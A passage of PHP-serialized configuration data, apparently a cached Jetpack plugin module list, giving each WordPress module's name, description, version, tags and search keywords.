social\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"f1b8c61705fb18eb8c8584c9f9cdffd9\";a:14:{s:4:\"name\";s:12:\"Contact Form\";s:11:\"description\";s:81:\"Add a customizable contact form to any post or page using the Jetpack Form Block.\";s:4:\"sort\";s:2:\"15\";s:20:\"recommendation_order\";s:2:\"14\";s:10:\"introduced\";s:3:\"1.3\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:5:\"Other\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:214:\"contact, form, grunion, feedback, submission, contact form, email, feedback, contact form plugin, custom form, custom form plugin, form builder, forms, form maker, survey, contact by jetpack, contact us, forms free\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"4fca6eb23a793155d69fdb119a094926\";a:14:{s:4:\"name\";s:9:\"Copy Post\";s:11:\"description\";s:77:\"Enable the option to copy entire posts and pages, including tags and settings\";s:4:\"sort\";s:2:\"15\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"7.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:15:\"copy, duplicate\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"cfdac01e3c3c529f93a8f49edef1f5db\";a:14:{s:4:\"name\";s:20:\"Custom content types\";s:11:\"description\";s:74:\"Display different types of content on your site with custom content types.\";s:4:\"sort\";s:2:\"34\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"3.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:72:\"cpt, custom post types, portfolio, portfolios, testimonial, testimonials\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"4b9137ecf507290743735fb1f94535df\";a:14:{s:4:\"name\";s:10:\"Custom CSS\";s:11:\"description\";s:88:\"Adds options for CSS preprocessor use, disabling the theme\'s CSS, or custom image width.\";s:4:\"sort\";s:1:\"2\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.7\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:10:\"Appearance\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:108:\"css, customize, custom, style, editor, less, sass, preprocessor, font, mobile, appearance, theme, stylesheet\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"95d75b38d76d2ee1b5b537026eadb8ff\";a:14:{s:4:\"name\";s:21:\"Enhanced Distribution\";s:11:\"description\";s:27:\"Increase reach and traffic.\";s:4:\"sort\";s:1:\"5\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:6:\"Public\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:54:\"google, seo, firehose, search, broadcast, broadcasting\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"f1bb571a95c5de1e6adaf9db8567c039\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"822f9ef1281dace3fb7cc420c77d24e0\";a:14:{s:4:\"name\";s:16:\"Google Analytics\";s:11:\"description\";s:56:\"Set up Google Analytics without touching a line of code.\";s:4:\"sort\";s:2:\"37\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"4.5\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:37:\"webmaster, google, analytics, console\";s:12:\"plan_classes\";s:17:\"business, premium\";}s:32:\"c167275f926ef0eefaec9a679bd88d34\";a:14:{s:4:\"name\";s:19:\"Gravatar Hovercards\";s:11:\"description\";s:58:\"Enable pop-up business cards over commentersâ€™ Gravatars.\";s:4:\"sort\";s:2:\"11\";s:20:\"recommendation_order\";s:2:\"13\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:18:\"Social, Appearance\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:20:\"gravatar, hovercards\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"58cbd4585a74829a1c88aa9c295f3993\";a:14:{s:4:\"name\";s:15:\"Infinite Scroll\";s:11:\"description\";s:53:\"Automatically load new content when a visitor scrolls\";s:4:\"sort\";s:2:\"26\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:10:\"Appearance\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:33:\"scroll, infinite, infinite scroll\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"d4a35eabc948caefad71a0d3303b95c8\";a:14:{s:4:\"name\";s:8:\"JSON API\";s:11:\"description\";s:51:\"Allow applications to securely access your content.\";s:4:\"sort\";s:2:\"19\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:6:\"Public\";s:11:\"module_tags\";s:19:\"Writing, Developers\";s:7:\"feature\";s:7:\"General\";s:25:\"additional_search_queries\";s:50:\"api, rest, develop, developers, json, klout, oauth\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"7b0c670bc3f8209dc83abb8610e23a89\";a:14:{s:4:\"name\";s:14:\"Beautiful Math\";s:11:\"description\";s:74:\"Use the LaTeX markup language to write mathematical equations and formulas\";s:4:\"sort\";s:2:\"12\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:47:\"latex, math, equation, equations, formula, code\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"b00e4e6c109ce6f77b5c83fbaaaead4c\";a:14:{s:4:\"name\";s:11:\"Lazy Images\";s:11:\"description\";s:137:\"Speed up your site and create a smoother viewing experience by loading images as visitors scroll down the screen, instead of all at once.\";s:4:\"sort\";s:2:\"24\";s:20:\"recommendation_order\";s:2:\"14\";s:10:\"introduced\";s:5:\"5.6.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:23:\"Appearance, Recommended\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:150:\"mobile, theme, fast images, fast image, image, lazy, lazy load, lazyload, images, lazy images, thumbnail, image lazy load, lazy loading, load, loading\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"8e46c72906c928eca634ac2c8b1bc84f\";a:14:{s:4:\"name\";s:5:\"Likes\";s:11:\"description\";s:63:\"Give visitors an easy way to show they appreciate your content.\";s:4:\"sort\";s:2:\"23\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:26:\"like, likes, wordpress.com\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"2df2264a07aff77e0556121e33349dce\";a:14:{s:4:\"name\";s:8:\"Markdown\";s:11:\"description\";s:50:\"Write posts or pages in plain-text Markdown syntax\";s:4:\"sort\";s:2:\"31\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.8\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:12:\"md, markdown\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"0337eacae47d30c946cb9fc4e5ece649\";a:14:{s:4:\"name\";s:21:\"WordPress.com Toolbar\";s:11:\"description\";s:91:\"Replaces the admin bar with a useful toolbar to quickly manage your site via WordPress.com.\";s:4:\"sort\";s:2:\"38\";s:20:\"recommendation_order\";s:2:\"16\";s:10:\"introduced\";s:3:\"4.8\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:7:\"General\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:19:\"adminbar, masterbar\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"cb5d81445061b89d19cb9c7754697a39\";a:14:{s:4:\"name\";s:12:\"Mobile Theme\";s:11:\"description\";s:31:\"Enable the Jetpack Mobile theme\";s:4:\"sort\";s:2:\"21\";s:20:\"recommendation_order\";s:2:\"11\";s:10:\"introduced\";s:3:\"1.8\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:31:\"Appearance, Mobile, Recommended\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:24:\"mobile, theme, minileven\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"ea0fbbd64080c81a90a784924603588c\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"5c53fdb3633ba3232f60180116900273\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"40b97d9ce396339d3e8e46b833a045b5\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"0739df64747f2d02c140f23ce6c19cd8\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"c54bb0a65b39f1316da8632197a88a4e\";a:14:{s:4:\"name\";s:7:\"Monitor\";s:11:\"description\";s:118:\"Jetpackâ€™s downtime monitoring will continuously watch your site, and alert you the moment that downtime is detected.\";s:4:\"sort\";s:2:\"28\";s:20:\"recommendation_order\";s:2:\"10\";s:10:\"introduced\";s:3:\"2.6\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:11:\"Recommended\";s:7:\"feature\";s:8:\"Security\";s:25:\"additional_search_queries\";s:123:\"monitor, uptime, downtime, monitoring, maintenance, maintenance mode, offline, site is down, site down, down, repair, error\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"cc013f4c5480c7bdc1e7edb2f410bf3c\";a:14:{s:4:\"name\";s:13:\"Notifications\";s:11:\"description\";s:57:\"Receive instant notifications of site comments and likes.\";s:4:\"sort\";s:2:\"13\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:5:\"Other\";s:7:\"feature\";s:7:\"General\";s:25:\"additional_search_queries\";s:62:\"notification, notifications, toolbar, adminbar, push, comments\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"b3b34928b1e549bb52f866accc0450c5\";a:14:{s:4:\"name\";s:9:\"Asset CDN\";s:11:\"description\";s:154:\"Jetpackâ€™s Site Accelerator loads your site faster by optimizing your images and serving your images and static files from our global network of servers.\";s:4:\"sort\";s:2:\"26\";s:20:\"recommendation_order\";s:1:\"1\";s:10:\"introduced\";s:3:\"6.6\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:42:\"Photos and Videos, Appearance, Recommended\";s:7:\"feature\";s:23:\"Recommended, Appearance\";s:25:\"additional_search_queries\";s:160:\"site accelerator, accelerate, static, assets, javascript, css, files, performance, cdn, bandwidth, content delivery network, pagespeed, combine js, optimize css\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"714284944f56d6936a40f3309900bc8e\";a:14:{s:4:\"name\";s:9:\"Image CDN\";s:11:\"description\";s:141:\"Mirrors and serves your images from our free and fast image CDN, improving your siteâ€™s performance with no additional load on your servers.\";s:4:\"sort\";s:2:\"25\";s:20:\"recommendation_order\";s:1:\"1\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:42:\"Photos and Videos, Appearance, Recommended\";s:7:\"feature\";s:23:\"Recommended, Appearance\";s:25:\"additional_search_queries\";s:171:\"photon, photo cdn, image cdn, speed, compression, resize, responsive images, responsive, content distribution network, optimize, page speed, image optimize, photon jetpack\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"348754bc914ee02c72d9af445627784c\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"041704e207c4c59eea93e0499c908bff\";a:14:{s:4:\"name\";s:13:\"Post by email\";s:11:\"description\";s:33:\"Publish posts by sending an email\";s:4:\"sort\";s:2:\"14\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:20:\"post by email, email\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"26e6cb3e08a6cfd0811c17e7c633c72c\";a:14:{s:4:\"name\";s:7:\"Protect\";s:11:\"description\";s:151:\"Enabling brute force protection will prevent bots and hackers from attempting to log in to your website with common username and password combinations.\";s:4:\"sort\";s:1:\"1\";s:20:\"recommendation_order\";s:1:\"4\";s:10:\"introduced\";s:3:\"3.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:11:\"Recommended\";s:7:\"feature\";s:8:\"Security\";s:25:\"additional_search_queries\";s:173:\"security, jetpack protect, secure, protection, botnet, brute force, protect, login, bot, password, passwords, strong passwords, strong password, wp-login.php,  protect admin\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"915a504082f797395713fd01e0e2e713\";a:14:{s:4:\"name\";s:9:\"Publicize\";s:11:\"description\";s:128:\"Publicize makes it easy to share your siteâ€™s posts on several social media networks automatically when you publish a new post.\";s:4:\"sort\";s:2:\"10\";s:20:\"recommendation_order\";s:1:\"7\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:19:\"Social, Recommended\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:220:\"facebook, jetpack publicize, twitter, tumblr, linkedin, social, tweet, connections, sharing, social media, automated, automated sharing, auto publish, auto tweet and like, auto tweet, facebook auto post, facebook posting\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"a7b21cc562ee9ffa357bba19701fe45b\";a:14:{s:4:\"name\";s:20:\"Progressive Web Apps\";s:11:\"description\";s:85:\"Speed up and improve the reliability of your site using the latest in web technology.\";s:4:\"sort\";s:2:\"38\";s:20:\"recommendation_order\";s:2:\"18\";s:10:\"introduced\";s:5:\"5.6.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:10:\"Developers\";s:7:\"feature\";s:7:\"Traffic\";s:25:\"additional_search_queries\";s:26:\"manifest, pwa, progressive\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"9243c1a718566213f4eaf3b44cf14b07\";a:14:{s:4:\"name\";s:13:\"Related posts\";s:11:\"description\";s:113:\"Keep visitors engaged on your blog by highlighting relevant and new content at the bottom of each published post.\";s:4:\"sort\";s:2:\"29\";s:20:\"recommendation_order\";s:1:\"9\";s:10:\"introduced\";s:3:\"2.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:11:\"Recommended\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:360:\"related, jetpack related posts, related posts for wordpress, related posts, popular posts, popular, related content, related post, contextual, context, contextual related posts, related articles, similar posts, easy related posts, related page, simple related posts, free related posts, related thumbnails, similar, engagement, yet another related posts plugin\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"583e4cda5596ee1b28a19cde33f438be\";a:14:{s:4:\"name\";s:6:\"Search\";s:11:\"description\";s:87:\"Enhanced search, powered by Elasticsearch, a powerful replacement for WordPress search.\";s:4:\"sort\";s:2:\"34\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"5.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:5:\"false\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:6:\"Search\";s:25:\"additional_search_queries\";s:110:\"search, elastic, elastic search, elasticsearch, fast search, search results, search performance, google search\";s:12:\"plan_classes\";s:8:\"business\";}s:32:\"15346c1f7f2a5f29d34378774ecfa830\";a:14:{s:4:\"name\";s:9:\"SEO Tools\";s:11:\"description\";s:50:\"Better results on search engines and social media.\";s:4:\"sort\";s:2:\"35\";s:20:\"recommendation_order\";s:2:\"15\";s:10:\"introduced\";s:3:\"4.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:18:\"Social, Appearance\";s:7:\"feature\";s:7:\"Traffic\";s:25:\"additional_search_queries\";s:81:\"search engine optimization, social preview, meta description, custom title format\";s:12:\"plan_classes\";s:17:\"business, premium\";}s:32:\"72a0ff4cfae86074a7cdd2dcd432ef11\";a:14:{s:4:\"name\";s:7:\"Sharing\";s:11:\"description\";s:120:\"Add Twitter, Facebook and Google+ buttons at the bottom of each post, making it easy for visitors to share your content.\";s:4:\"sort\";s:1:\"7\";s:20:\"recommendation_order\";s:1:\"6\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:3:\"1.2\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:19:\"Social, Recommended\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:229:\"share, sharing, sharedaddy, social buttons, buttons, share facebook, share twitter, social media sharing, social media share, social share, icons, email, facebook, twitter, linkedin, pinterest, pocket, social widget, social media\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"bb8c6c190aaec212a7ab6e940165af4d\";a:14:{s:4:\"name\";s:16:\"Shortcode Embeds\";s:11:\"description\";s:177:\"Shortcodes are WordPress-specific markup that let you add media from popular sites. This feature is no longer necessary as the editor now handles media embeds rather gracefully.\";s:4:\"sort\";s:1:\"3\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:3:\"1.2\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:46:\"Photos and Videos, Social, Writing, Appearance\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:236:\"shortcodes, shortcode, embeds, media, bandcamp, dailymotion, facebook, flickr, google calendars, google maps, google+, polldaddy, recipe, recipes, scribd, slideshare, slideshow, slideshows, soundcloud, ted, twitter, vimeo, vine, youtube\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"1abd31fe07ae4fb0f8bb57dc24592219\";a:14:{s:4:\"name\";s:16:\"WP.me Shortlinks\";s:11:\"description\";s:82:\"Generates shorter links so you can have more space to write on social media sites.\";s:4:\"sort\";s:1:\"8\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:17:\"shortlinks, wp.me\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"cae5f097f8d658e0b0ae50733d7c6476\";a:14:{s:4:\"name\";s:8:\"Sitemaps\";s:11:\"description\";s:50:\"Make it easy for search engines to find your site.\";s:4:\"sort\";s:2:\"13\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"3.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:20:\"Recommended, Traffic\";s:7:\"feature\";s:11:\"Recommended\";s:25:\"additional_search_queries\";s:39:\"sitemap, traffic, search, site map, seo\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"e9b8318133b2f95e7906cedb3557a87d\";a:14:{s:4:\"name\";s:14:\"Secure Sign On\";s:11:\"description\";s:63:\"Allow users to log in to this site using WordPress.com accounts\";s:4:\"sort\";s:2:\"30\";s:20:\"recommendation_order\";s:1:\"5\";s:10:\"introduced\";s:3:\"2.6\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:10:\"Developers\";s:7:\"feature\";s:8:\"Security\";s:25:\"additional_search_queries\";s:34:\"sso, single sign on, login, log in\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"17e66a12031ccf11d8d45ceee0955f05\";a:14:{s:4:\"name\";s:10:\"Site Stats\";s:11:\"description\";s:44:\"Collect valuable traffic stats and insights.\";s:4:\"sort\";s:1:\"1\";s:20:\"recommendation_order\";s:1:\"2\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:23:\"Site Stats, Recommended\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:54:\"statistics, tracking, analytics, views, traffic, stats\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"346cf9756e7c1252acecb9a8ca81a21c\";a:14:{s:4:\"name\";s:13:\"Subscriptions\";s:11:\"description\";s:58:\"Let visitors subscribe to new posts and comments via email\";s:4:\"sort\";s:1:\"9\";s:20:\"recommendation_order\";s:1:\"8\";s:10:\"introduced\";s:3:\"1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:74:\"subscriptions, subscription, email, follow, followers, subscribers, 